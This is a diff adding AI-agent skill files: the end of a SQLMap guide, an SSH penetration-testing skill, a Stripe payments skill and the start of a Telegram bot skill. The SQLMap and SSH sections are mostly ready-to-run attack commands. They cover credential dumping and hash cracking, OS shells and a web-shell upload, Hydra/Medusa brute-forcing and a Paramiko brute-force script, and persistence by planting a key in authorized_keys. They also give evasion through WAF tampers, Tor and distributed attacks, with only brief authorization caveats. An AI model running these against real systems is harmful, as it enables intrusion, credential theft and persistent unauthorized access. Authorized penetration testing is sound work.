|
||||
| Microsoft SQL Server | Full Support |
|
||||
| Oracle | Full Support |
|
||||
| Microsoft Access | Full Support |
|
||||
| IBM DB2 | Full Support |
|
||||
| SQLite | Full Support |
|
||||
| Firebird | Full Support |
|
||||
| Sybase | Full Support |
|
||||
| SAP MaxDB | Full Support |
|
||||
| HSQLDB | Full Support |
|
||||
| Informix | Full Support |
|
||||
|
||||
### SQL Injection Techniques
|
||||
|
||||
| Technique | Description | Flag |
|
||||
|-----------|-------------|------|
|
||||
| Boolean-based blind | Infers data from true/false responses | `--technique=B` |
|
||||
| Time-based blind | Uses time delays to infer data | `--technique=T` |
|
||||
| Error-based | Extracts data from error messages | `--technique=E` |
|
||||
| UNION query-based | Uses UNION to append results | `--technique=U` |
|
||||
| Stacked queries | Executes multiple statements | `--technique=S` |
|
||||
| Out-of-band | Uses DNS or HTTP for exfiltration | `--technique=Q` |
|
||||
|
||||
### Essential Options
|
||||
|
||||
| Option | Description |
|
||||
|--------|-------------|
|
||||
| `-u` | Target URL |
|
||||
| `-r` | Load HTTP request from file |
|
||||
| `-l` | Parse targets from Burp/WebScarab log |
|
||||
| `-m` | Bulk file with multiple targets |
|
||||
| `-g` | Google dork (use responsibly) |
|
||||
| `--dbs` | Enumerate databases |
|
||||
| `--tables` | Enumerate tables |
|
||||
| `--columns` | Enumerate columns |
|
||||
| `--dump` | Dump table data |
|
||||
| `--dump-all` | Dump all database data |
|
||||
| `-D` | Specify database |
|
||||
| `-T` | Specify table |
|
||||
| `-C` | Specify columns |
|
||||
| `--batch` | Non-interactive mode |
|
||||
| `--random-agent` | Use random User-Agent |
|
||||
| `--level` | Level of tests (1-5) |
|
||||
| `--risk` | Risk of tests (1-3) |
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Operational Boundaries
|
||||
- Requires valid injectable parameter in target URL
|
||||
- Network connectivity to target database server required
|
||||
- Large database dumps may take significant time
|
||||
- Some WAF/IPS systems may block SQLMap traffic
|
||||
- Time-based attacks significantly slower than error-based
|
||||
|
||||
### Performance Considerations
|
||||
- Use `--threads` to speed up enumeration (default: 1)
|
||||
- Limit dumps with `--start` and `--stop` for large tables
|
||||
- Use `--technique` to specify faster injection method if known
|
||||
|
||||
### Legal Requirements
|
||||
- Only test systems with explicit written authorization
|
||||
- Google dork attacks against unknown sites are illegal
|
||||
- Document all testing activities and findings
|
||||
- Respect scope limitations defined in engagement rules
|
||||
|
||||
### Detection Risk
|
||||
- SQLMap generates significant log entries
|
||||
- Use `--random-agent` to vary User-Agent header
|
||||
- Consider `--delay` to avoid triggering rate limits
|
||||
- Proxy through Tor with `--tor` for anonymity (authorized tests only)
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Complete Database Enumeration
|
||||
```bash
|
||||
# Step 1: Discover databases
|
||||
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
|
||||
# Result: acuart database found
|
||||
|
||||
# Step 2: List tables
|
||||
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
|
||||
# Result: users, products, carts, etc.
|
||||
|
||||
# Step 3: List columns
|
||||
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
|
||||
# Result: username, password, email columns
|
||||
|
||||
# Step 4: Dump user credentials
|
||||
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
|
||||
```
|
||||
|
||||
### Example 2: POST Request Injection
|
||||
```bash
|
||||
# Save Burp request to file (login.txt):
|
||||
# POST /login.php HTTP/1.1
|
||||
# Host: target.com
|
||||
# Content-Type: application/x-www-form-urlencoded
|
||||
#
|
||||
# username=admin&password=test
|
||||
|
||||
# Run SQLMap with request file
|
||||
sqlmap -r /root/Desktop/login.txt -p username --dbs --batch
|
||||
```
|
||||
|
||||
### Example 3: Bulk Target Scanning
|
||||
```bash
|
||||
# Create bulkfile.txt:
|
||||
echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt
|
||||
echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt
|
||||
|
||||
# Scan all targets
|
||||
sqlmap -m bulkfile.txt --dbs --batch
|
||||
```
|
||||
|
||||
### Example 4: Aggressive Testing
|
||||
```bash
|
||||
# High level and risk for thorough testing
|
||||
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3
|
||||
|
||||
# Specify all techniques
|
||||
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ
|
||||
```
|
||||
|
||||
### Example 5: Extract Specific Credentials
|
||||
```bash
|
||||
# Target specific columns
|
||||
sqlmap -u "http://target.com/page.php?id=1" \
|
||||
-D webapp \
|
||||
-T admin_users \
|
||||
-C admin_name,admin_pass,admin_email \
|
||||
--dump --batch
|
||||
|
||||
# Automatically crack password hashes
|
||||
sqlmap -u "http://target.com/page.php?id=1" \
|
||||
-D webapp \
|
||||
-T users \
|
||||
--dump --batch \
|
||||
--passwords
|
||||
```
|
||||
|
||||
### Example 6: OS Shell Access (Advanced)
|
||||
```bash
|
||||
# Get interactive OS shell (requires DBA privileges)
|
||||
sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch
|
||||
|
||||
# Execute specific OS command
|
||||
sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch
|
||||
|
||||
# File read from server
|
||||
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch
|
||||
|
||||
# File upload to server
|
||||
sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Issue: "Parameter does not seem injectable"
|
||||
**Cause**: SQLMap cannot find injection point
|
||||
**Solution**:
|
||||
```bash
|
||||
# Increase testing level and risk
|
||||
sqlmap -u "URL" --dbs --batch --level=5 --risk=3
|
||||
|
||||
# Specify parameter explicitly
|
||||
sqlmap -u "URL" -p "id" --dbs --batch
|
||||
|
||||
# Try different injection techniques
|
||||
sqlmap -u "URL" --dbs --batch --technique=BT
|
||||
|
||||
# Add prefix/suffix for filter bypass
|
||||
sqlmap -u "URL" --dbs --batch --prefix="'" --suffix="-- -"
|
||||
```
|
||||
|
||||
### Issue: Target Behind WAF/Firewall
|
||||
**Cause**: Web Application Firewall blocking requests
|
||||
**Solution**:
|
||||
```bash
|
||||
# Use tamper scripts
|
||||
sqlmap -u "URL" --dbs --batch --tamper=space2comment
|
||||
|
||||
# List available tamper scripts
|
||||
sqlmap --list-tampers
|
||||
|
||||
# Common tamper combinations
|
||||
sqlmap -u "URL" --dbs --batch --tamper=space2comment,between,randomcase
|
||||
|
||||
# Add delay between requests
|
||||
sqlmap -u "URL" --dbs --batch --delay=2
|
||||
|
||||
# Use random User-Agent
|
||||
sqlmap -u "URL" --dbs --batch --random-agent
|
||||
```
|
||||
|
||||
### Issue: Connection Timeout
|
||||
**Cause**: Network issues or slow target
|
||||
**Solution**:
|
||||
```bash
|
||||
# Increase timeout
|
||||
sqlmap -u "URL" --dbs --batch --timeout=60
|
||||
|
||||
# Reduce threads
|
||||
sqlmap -u "URL" --dbs --batch --threads=1
|
||||
|
||||
# Add retries
|
||||
sqlmap -u "URL" --dbs --batch --retries=5
|
||||
```
|
||||
|
||||
### Issue: Time-Based Attacks Too Slow
|
||||
**Cause**: Default time delay too conservative
|
||||
**Solution**:
|
||||
```bash
|
||||
# Reduce time delay (risky, may cause false negatives)
|
||||
sqlmap -u "URL" --dbs --batch --time-sec=3
|
||||
|
||||
# Use boolean-based instead if possible
|
||||
sqlmap -u "URL" --dbs --batch --technique=B
|
||||
```
|
||||
|
||||
### Issue: Cannot Dump Large Tables
|
||||
**Cause**: Table has too many records
|
||||
**Solution**:
|
||||
```bash
|
||||
# Limit number of records
|
||||
sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100
|
||||
|
||||
# Dump specific columns only
|
||||
sqlmap -u "URL" -D db -T table -C username,password --dump --batch
|
||||
|
||||
# Exclude specific columns
|
||||
sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs
|
||||
```
|
||||
|
||||
### Issue: Session Drops During Long Scan
|
||||
**Cause**: Session timeout or connection reset
|
||||
**Solution**:
|
||||
```bash
|
||||
# Save and resume session
|
||||
sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session
|
||||
|
||||
# Resume from saved session
|
||||
sqlmap -u "URL" --dbs --batch --resume
|
||||
|
||||
# Use persistent HTTP connection
|
||||
sqlmap -u "URL" --dbs --batch --keep-alive
|
||||
```
|
||||
485
skills/ssh-penetration-testing/SKILL.md
Normal file
485
skills/ssh-penetration-testing/SKILL.md
Normal file
@@ -0,0 +1,485 @@
|
||||
---
|
||||
name: SSH Penetration Testing
|
||||
description: This skill should be used when the user asks to "pentest SSH services", "enumerate SSH configurations", "brute force SSH credentials", "exploit SSH vulnerabilities", "perform SSH tunneling", or "audit SSH security". It provides comprehensive SSH penetration testing methodologies and techniques.
|
||||
---
|
||||
|
||||
# SSH Penetration Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### Required Tools
|
||||
- Nmap with SSH scripts
|
||||
- Hydra or Medusa for brute-forcing
|
||||
- ssh-audit for configuration analysis
|
||||
- Metasploit Framework
|
||||
- Python with Paramiko library
|
||||
|
||||
### Required Knowledge
|
||||
- SSH protocol fundamentals
|
||||
- Public/private key authentication
|
||||
- Port forwarding concepts
|
||||
- Linux command-line proficiency
|
||||
|
||||
## Outputs and Deliverables
|
||||
|
||||
1. **SSH Enumeration Report** - Versions, algorithms, configurations
|
||||
2. **Credential Assessment** - Weak passwords, default credentials
|
||||
3. **Vulnerability Assessment** - Known CVEs, misconfigurations
|
||||
4. **Tunnel Documentation** - Port forwarding configurations
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: SSH Service Discovery
|
||||
|
||||
Identify SSH services on target networks:
|
||||
|
||||
```bash
|
||||
# Quick SSH port scan
|
||||
nmap -p 22 192.168.1.0/24 --open
|
||||
|
||||
# Common alternate SSH ports
|
||||
nmap -p 22,2222,22222,2200 192.168.1.100
|
||||
|
||||
# Full port scan for SSH
|
||||
nmap -p- --open 192.168.1.100 | grep -i ssh
|
||||
|
||||
# Service version detection
|
||||
nmap -sV -p 22 192.168.1.100
|
||||
```
|
||||
|
||||
### Phase 2: SSH Enumeration
|
||||
|
||||
Gather detailed information about SSH services:
|
||||
|
||||
```bash
|
||||
# Banner grabbing
|
||||
nc 192.168.1.100 22
|
||||
# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5
|
||||
|
||||
# Telnet banner grab
|
||||
telnet 192.168.1.100 22
|
||||
|
||||
# Nmap version detection with scripts
|
||||
nmap -sV -p 22 --script ssh-hostkey 192.168.1.100
|
||||
|
||||
# Enumerate supported algorithms
|
||||
nmap -p 22 --script ssh2-enum-algos 192.168.1.100
|
||||
|
||||
# Get host keys
|
||||
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100
|
||||
|
||||
# Check authentication methods
|
||||
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=root" 192.168.1.100
|
||||
```
|
||||
|
||||
### Phase 3: SSH Configuration Auditing
|
||||
|
||||
Identify weak configurations:
|
||||
|
||||
```bash
|
||||
# ssh-audit - comprehensive SSH audit
|
||||
ssh-audit 192.168.1.100
|
||||
|
||||
# ssh-audit with specific port
|
||||
ssh-audit -p 2222 192.168.1.100
|
||||
|
||||
# Output includes:
|
||||
# - Algorithm recommendations
|
||||
# - Security vulnerabilities
|
||||
# - Hardening suggestions
|
||||
```
|
||||
|
||||
Key configuration weaknesses to identify:
|
||||
- Weak key exchange algorithms (diffie-hellman-group1-sha1)
|
||||
- Weak ciphers (arcfour, 3des-cbc)
|
||||
- Weak MACs (hmac-md5, hmac-sha1-96)
|
||||
- Deprecated protocol versions
|
||||
|
||||
### Phase 4: Credential Attacks
|
||||
|
||||
#### Brute-Force with Hydra
|
||||
|
||||
```bash
|
||||
# Single username, password list
|
||||
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
|
||||
|
||||
# Username list, single password
|
||||
hydra -L users.txt -p Password123 ssh://192.168.1.100
|
||||
|
||||
# Username and password lists
|
||||
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
|
||||
|
||||
# With specific port
|
||||
hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100
|
||||
|
||||
# Rate limiting evasion (slow)
|
||||
hydra -l admin -P passwords.txt -t 1 -w 5 ssh://192.168.1.100
|
||||
|
||||
# Verbose output
|
||||
hydra -l admin -P passwords.txt -vV ssh://192.168.1.100
|
||||
|
||||
# Exit on first success
|
||||
hydra -l admin -P passwords.txt -f ssh://192.168.1.100
|
||||
```
|
||||
|
||||
#### Brute-Force with Medusa
|
||||
|
||||
```bash
|
||||
# Basic brute-force
|
||||
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh
|
||||
|
||||
# Multiple targets
|
||||
medusa -H targets.txt -u admin -P passwords.txt -M ssh
|
||||
|
||||
# With username list
|
||||
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh
|
||||
|
||||
# Specific port
|
||||
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222
|
||||
```
|
||||
|
||||
#### Password Spraying
|
||||
|
||||
```bash
|
||||
# Test common password across users
|
||||
hydra -L users.txt -p Summer2024! ssh://192.168.1.100
|
||||
|
||||
# Multiple common passwords
|
||||
for pass in "Password123" "Welcome1" "Summer2024!"; do
|
||||
hydra -L users.txt -p "$pass" ssh://192.168.1.100
|
||||
done
|
||||
```
|
||||
|
||||
### Phase 5: Key-Based Authentication Testing
|
||||
|
||||
Test for weak or exposed keys:
|
||||
|
||||
```bash
|
||||
# Attempt login with found private key
|
||||
ssh -i id_rsa user@192.168.1.100
|
||||
|
||||
# Specify key explicitly (bypass agent)
|
||||
ssh -o IdentitiesOnly=yes -i id_rsa user@192.168.1.100
|
||||
|
||||
# Force password authentication
|
||||
ssh -o PreferredAuthentications=password user@192.168.1.100
|
||||
|
||||
# Try common key names
|
||||
for key in id_rsa id_dsa id_ecdsa id_ed25519; do
|
||||
ssh -i "$key" user@192.168.1.100
|
||||
done
|
||||
```
|
||||
|
||||
Check for exposed keys:
|
||||
|
||||
```bash
|
||||
# Common locations for private keys
|
||||
~/.ssh/id_rsa
|
||||
~/.ssh/id_dsa
|
||||
~/.ssh/id_ecdsa
|
||||
~/.ssh/id_ed25519
|
||||
/etc/ssh/ssh_host_*_key
|
||||
/root/.ssh/
|
||||
/home/*/.ssh/
|
||||
|
||||
# Web-accessible keys (check with curl/wget)
|
||||
curl -s http://target.com/.ssh/id_rsa
|
||||
curl -s http://target.com/id_rsa
|
||||
curl -s http://target.com/backup/ssh_keys.tar.gz
|
||||
```
|
||||
|
||||
### Phase 6: Vulnerability Exploitation
|
||||
|
||||
Search for known vulnerabilities:
|
||||
|
||||
```bash
|
||||
# Search for exploits
|
||||
searchsploit openssh
|
||||
searchsploit openssh 7.2
|
||||
|
||||
# Common SSH vulnerabilities
|
||||
# CVE-2018-15473 - Username enumeration
|
||||
# CVE-2016-0777 - Roaming vulnerability
|
||||
# CVE-2016-0778 - Buffer overflow
|
||||
|
||||
# Metasploit enumeration
|
||||
msfconsole
|
||||
use auxiliary/scanner/ssh/ssh_version
|
||||
set RHOSTS 192.168.1.100
|
||||
run
|
||||
|
||||
# Username enumeration (CVE-2018-15473)
|
||||
use auxiliary/scanner/ssh/ssh_enumusers
|
||||
set RHOSTS 192.168.1.100
|
||||
set USER_FILE /usr/share/wordlists/users.txt
|
||||
run
|
||||
```
|
||||
|
||||
### Phase 7: SSH Tunneling and Port Forwarding
|
||||
|
||||
#### Local Port Forwarding
|
||||
|
||||
Forward local port to remote service:
|
||||
|
||||
```bash
|
||||
# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server
|
||||
|
||||
# Access internal web server through SSH
|
||||
ssh -L 8080:192.168.1.50:80 user@192.168.1.100
|
||||
# Now access http://localhost:8080
|
||||
|
||||
# Access internal database
|
||||
ssh -L 3306:192.168.1.50:3306 user@192.168.1.100
|
||||
|
||||
# Multiple forwards
|
||||
ssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 user@192.168.1.100
|
||||
```
|
||||
|
||||
#### Remote Port Forwarding
|
||||
|
||||
Expose local service to remote network:
|
||||
|
||||
```bash
|
||||
# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server
|
||||
|
||||
# Expose local web server to remote
|
||||
ssh -R 8080:localhost:80 user@192.168.1.100
|
||||
# Remote can access via localhost:8080
|
||||
|
||||
# Reverse shell callback
|
||||
ssh -R 4444:localhost:4444 user@192.168.1.100
|
||||
```
|
||||
|
||||
#### Dynamic Port Forwarding (SOCKS Proxy)
|
||||
|
||||
Create SOCKS proxy for network pivoting:
|
||||
|
||||
```bash
|
||||
# Create SOCKS proxy on local port 1080
|
||||
ssh -D 1080 user@192.168.1.100
|
||||
|
||||
# Use with proxychains
|
||||
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
|
||||
proxychains nmap -sT -Pn 192.168.1.0/24
|
||||
|
||||
# Browser configuration
|
||||
# Set SOCKS proxy to localhost:1080
|
||||
```
|
||||
|
||||
#### ProxyJump (Jump Hosts)
|
||||
|
||||
Chain through multiple SSH servers:
|
||||
|
||||
```bash
|
||||
# Jump through intermediate host
|
||||
ssh -J user1@jump_host user2@target_host
|
||||
|
||||
# Multiple jumps
|
||||
ssh -J user1@jump1,user2@jump2 user3@target
|
||||
|
||||
# With SSH config
|
||||
# ~/.ssh/config
|
||||
Host target
|
||||
HostName 192.168.2.50
|
||||
User admin
|
||||
ProxyJump user@192.168.1.100
|
||||
```
|
||||
|
||||
### Phase 8: Post-Exploitation
|
||||
|
||||
Activities after gaining SSH access:
|
||||
|
||||
```bash
|
||||
# Check sudo privileges
|
||||
sudo -l
|
||||
|
||||
# Find SSH keys
|
||||
find / -name "id_rsa" 2>/dev/null
|
||||
find / -name "id_dsa" 2>/dev/null
|
||||
find / -name "authorized_keys" 2>/dev/null
|
||||
|
||||
# Check SSH directory
|
||||
ls -la ~/.ssh/
|
||||
cat ~/.ssh/known_hosts
|
||||
cat ~/.ssh/authorized_keys
|
||||
|
||||
# Add persistence (add your key)
|
||||
echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys
|
||||
|
||||
# Extract SSH configuration
|
||||
cat /etc/ssh/sshd_config
|
||||
|
||||
# Find other users
|
||||
cat /etc/passwd | grep -v nologin
|
||||
ls /home/
|
||||
|
||||
# History for credentials
|
||||
cat ~/.bash_history | grep -i ssh
|
||||
cat ~/.bash_history | grep -i pass
|
||||
```
|
||||
|
||||
### Phase 9: Custom SSH Scripts with Paramiko
|
||||
|
||||
Python-based SSH automation:
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import paramiko
|
||||
import sys
|
||||
|
||||
def ssh_connect(host, username, password):
|
||||
"""Attempt SSH connection with credentials"""
|
||||
client = paramiko.SSHClient()
|
||||
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
|
||||
try:
|
||||
client.connect(host, username=username, password=password, timeout=5)
|
||||
print(f"[+] Success: {username}:{password}")
|
||||
return client
|
||||
except paramiko.AuthenticationException:
|
||||
print(f"[-] Failed: {username}:{password}")
|
||||
return None
|
||||
except Exception as e:
|
||||
print(f"[!] Error: {e}")
|
||||
return None
|
||||
|
||||
def execute_command(client, command):
|
||||
"""Execute command via SSH"""
|
||||
stdin, stdout, stderr = client.exec_command(command)
|
||||
output = stdout.read().decode()
|
||||
errors = stderr.read().decode()
|
||||
return output, errors
|
||||
|
||||
def ssh_brute_force(host, username, wordlist):
|
||||
"""Brute-force SSH with wordlist"""
|
||||
with open(wordlist, 'r') as f:
|
||||
passwords = f.read().splitlines()
|
||||
|
||||
for password in passwords:
|
||||
client = ssh_connect(host, username, password.strip())
|
||||
if client:
|
||||
# Run post-exploitation commands
|
||||
output, _ = execute_command(client, 'id; uname -a')
|
||||
print(output)
|
||||
client.close()
|
||||
return True
|
||||
return False
|
||||
|
||||
# Usage
|
||||
if __name__ == "__main__":
|
||||
target = "192.168.1.100"
|
||||
user = "admin"
|
||||
|
||||
# Single credential test
|
||||
client = ssh_connect(target, user, "password123")
|
||||
if client:
|
||||
output, _ = execute_command(client, "ls -la")
|
||||
print(output)
|
||||
client.close()
|
||||
```
|
||||
|
||||
### Phase 10: Metasploit SSH Modules
|
||||
|
||||
Use Metasploit for comprehensive SSH testing:
|
||||
|
||||
```bash
|
||||
# Start Metasploit
|
||||
msfconsole
|
||||
|
||||
# SSH Version Scanner
|
||||
use auxiliary/scanner/ssh/ssh_version
|
||||
set RHOSTS 192.168.1.0/24
|
||||
run
|
||||
|
||||
# SSH Login Brute-Force
|
||||
use auxiliary/scanner/ssh/ssh_login
|
||||
set RHOSTS 192.168.1.100
|
||||
set USERNAME admin
|
||||
set PASS_FILE /usr/share/wordlists/rockyou.txt
|
||||
set VERBOSE true
|
||||
run
|
||||
|
||||
# SSH Key Login
|
||||
use auxiliary/scanner/ssh/ssh_login_pubkey
|
||||
set RHOSTS 192.168.1.100
|
||||
set USERNAME admin
|
||||
set KEY_FILE /path/to/id_rsa
|
||||
run
|
||||
|
||||
# Username Enumeration
|
||||
use auxiliary/scanner/ssh/ssh_enumusers
|
||||
set RHOSTS 192.168.1.100
|
||||
set USER_FILE users.txt
|
||||
run
|
||||
|
||||
# Post-exploitation with SSH session
|
||||
sessions -i 1
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### SSH Enumeration Commands
|
||||
|
||||
| Command | Purpose |
|
||||
|---------|---------|
|
||||
| `nc <host> 22` | Banner grabbing |
|
||||
| `ssh-audit <host>` | Configuration audit |
|
||||
| `nmap --script ssh*` | SSH NSE scripts |
|
||||
| `searchsploit openssh` | Find exploits |
|
||||
|
||||
### Brute-Force Options
|
||||
|
||||
| Tool | Command |
|
||||
|------|---------|
|
||||
| Hydra | `hydra -l user -P pass.txt ssh://host` |
|
||||
| Medusa | `medusa -h host -u user -P pass.txt -M ssh` |
|
||||
| Ncrack | `ncrack -p 22 --user admin -P pass.txt host` |
|
||||
| Metasploit | `use auxiliary/scanner/ssh/ssh_login` |
|
||||
|
||||
### Port Forwarding Types
|
||||
|
||||
| Type | Command | Use Case |
|
||||
|------|---------|----------|
|
||||
| Local | `-L 8080:target:80` | Access remote services locally |
|
||||
| Remote | `-R 8080:localhost:80` | Expose local services remotely |
|
||||
| Dynamic | `-D 1080` | SOCKS proxy for pivoting |
|
||||
|
||||
### Common SSH Ports
|
||||
|
||||
| Port | Description |
|
||||
|------|-------------|
|
||||
| 22 | Default SSH |
|
||||
| 2222 | Common alternate |
|
||||
| 22222 | Another alternate |
|
||||
| 830 | NETCONF over SSH |
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Legal Considerations
|
||||
- Always obtain written authorization
|
||||
- Brute-forcing may violate ToS
|
||||
- Document all testing activities
|
||||
|
||||
### Technical Limitations
|
||||
- Rate limiting may block attacks
|
||||
- Fail2ban or similar may ban IPs
|
||||
- Key-based auth prevents password attacks
|
||||
- Two-factor authentication adds complexity
|
||||
|
||||
### Evasion Techniques
|
||||
- Use slow brute-force: `-t 1 -w 5`
|
||||
- Distribute attacks across IPs
|
||||
- Use timing-based enumeration carefully
|
||||
- Respect lockout thresholds
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solutions |
|
||||
|-------|-----------|
|
||||
| Connection Refused | Verify SSH running; check firewall; confirm port; test from different IP |
|
||||
| Authentication Failures | Verify username; check password policy; key permissions (600); authorized_keys format |
|
||||
| Tunnel Not Working | Check GatewayPorts/AllowTcpForwarding in sshd_config; verify firewall; use `ssh -v` |
|
||||
69
skills/stripe-integration/SKILL.md
Normal file
69
skills/stripe-integration/SKILL.md
Normal file
@@ -0,0 +1,69 @@
|
||||
---
|
||||
name: stripe-integration
|
||||
description: "Get paid from day one. Payments, subscriptions, billing portal, webhooks, metered billing, Stripe Connect. The complete guide to implementing Stripe correctly, including all the edge cases that will bite you at 3am. This isn't just API calls - it's the full payment system: handling failures, managing subscriptions, dealing with dunning, and keeping revenue flowing. Use when: stripe, payments, subscription, billing, checkout."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Stripe Integration
|
||||
|
||||
You are a payments engineer who has processed billions in transactions.
|
||||
You've seen every edge case - declined cards, webhook failures, subscription
|
||||
nightmares, currency issues, refund fraud. You know that payments code must
|
||||
be bulletproof because errors cost real money. You're paranoid about race
|
||||
conditions, idempotency, and webhook verification.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- stripe-payments
|
||||
- subscription-management
|
||||
- billing-portal
|
||||
- stripe-webhooks
|
||||
- checkout-sessions
|
||||
- payment-intents
|
||||
- stripe-connect
|
||||
- metered-billing
|
||||
- dunning-management
|
||||
- payment-failure-handling
|
||||
|
||||
## Requirements
|
||||
|
||||
- supabase-backend
|
||||
|
||||
## Patterns
|
||||
|
||||
### Idempotency Key Everything
|
||||
|
||||
Use idempotency keys on all payment operations to prevent duplicate charges
|
||||
|
||||
### Webhook State Machine
|
||||
|
||||
Handle webhooks as state transitions, not triggers
|
||||
|
||||
### Test Mode Throughout Development
|
||||
|
||||
Use Stripe test mode with real test cards for all development
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Trust the API Response
|
||||
|
||||
### ❌ Webhook Without Signature Verification
|
||||
|
||||
### ❌ Subscription Status Checks Without Refresh
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Not verifying webhook signatures | critical | # Always verify signatures: |
|
||||
| JSON middleware parsing body before webhook can verify | critical | # Next.js App Router: |
|
||||
| Not using idempotency keys for payment operations | high | # Always use idempotency keys: |
|
||||
| Trusting API responses instead of webhooks for payment statu | critical | # Webhook-first architecture: |
|
||||
| Not passing metadata through checkout session | high | # Always include metadata: |
|
||||
| Local subscription state drifting from Stripe state | high | # Handle ALL subscription webhooks: |
|
||||
| Not handling failed payments and dunning | high | # Handle invoice.payment_failed: |
|
||||
| Different code paths or behavior between test and live mode | high | # Separate all keys: |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `nextjs-supabase-auth`, `supabase-backend`, `webhook-patterns`, `security`
|
||||
254
skills/telegram-bot-builder/SKILL.md
Normal file
254
skills/telegram-bot-builder/SKILL.md
Normal file
@@ -0,0 +1,254 @@
|
||||
---
|
||||
name: telegram-bot-builder
|
||||
description: "Expert in building Telegram bots that solve real problems - from simple automation to complex AI-powered bots. Covers bot architecture, the Telegram Bot API, user experience, monetization strategies, and scaling bots to thousands of users. Use when: telegram bot, bot api, telegram automation, chat bot telegram, tg bot."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Telegram Bot Builder
|
||||
|
||||
**Role**: Telegram Bot Architect
|
||||
|
||||
You build bots that people actually use daily. You understand that bots
|
||||
should feel like helpful assistants, not clunky interfaces. You know
|
||||
the Telegram ecosystem deeply - what's possible, what's popular, and
|
||||
what makes money. You design conversations that feel natural.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Telegram Bot API
|
||||
- Bot architecture
|
||||
- Command design
|
||||
- Inline keyboards
|
||||
- Bot monetization
|
||||
- User onboarding
|
||||
- Bot analytics
|
||||
- Webhook management
|
||||
|
||||
## Patterns
|
||||
|
||||
### Bot Architecture
|
||||
|
||||
Structure for maintainable Telegram bots
|
||||
|
||||
**When to use**: When starting a new bot project
|
||||
|
||||
```python
|
||||
## Bot Architecture
|
||||
|
||||
### Stack Options
|
||||
| Language | Library | Best For |
|
||||
|----------|---------|----------|
|
||||
| Node.js | telegraf | Most projects |
|
||||
| Node.js | grammY | TypeScript, modern |
|
||||
| Python | python-telegram-bot | Quick prototypes |
|
||||
| Python | aiogram | Async, scalable |
|
||||
|
||||
### Basic Telegraf Setup
|
||||
```javascript
|
||||
import { Telegraf } from 'telegraf';
|
||||
|
||||
const bot = new Telegraf(process.env.BOT_TOKEN);
|
||||
|
||||
// Command handlers
|
||||
bot.start((ctx) => ctx.reply('Welcome!'));
|
||||
bot.help((ctx) => ctx.reply('How can I help?'));
|
||||
|
||||
// Text handler
|
||||
bot.on('text', (ctx) => {
|
||||
ctx.reply(`You said: ${ctx.message.text}`);
|
||||
});
|
||||
|
||||
// Launch
|
||||
bot.launch();
|
||||
|
||||
// Graceful shutdown
|
||||
process.once('SIGINT', () => bot.stop('SIGINT'));
|
||||
process.once('SIGTERM', () => bot.stop('SIGTERM'));
|
||||
```
|
||||
|
||||
### Project Structure
|
||||
```
|
||||
telegram-bot/
|
||||
├── src/
|
||||
│ ├── bot.js # Bot initialization
|
||||
│ ├── commands/ # Command handlers
|
||||
│ │ ├── start.js
|
||||
│ │ ├── help.js
|
||||
│ │ └── settings.js
|
||||
│ ├── handlers/ # Message handlers
|
||||
│ ├── keyboards/ # Inline keyboards
|
||||
│ ├── middleware/ # Auth, logging
|
||||
│ └── services/ # Business logic
|
||||
├── .env
|
||||
└── package.json
|
||||
```
|
||||
```
|
||||
|
||||
### Inline Keyboards
|
||||
|
||||
Interactive button interfaces
|
||||
|
||||
**When to use**: When building interactive bot flows
|
||||
|
||||
```python
|
||||
## Inline Keyboards
|
||||
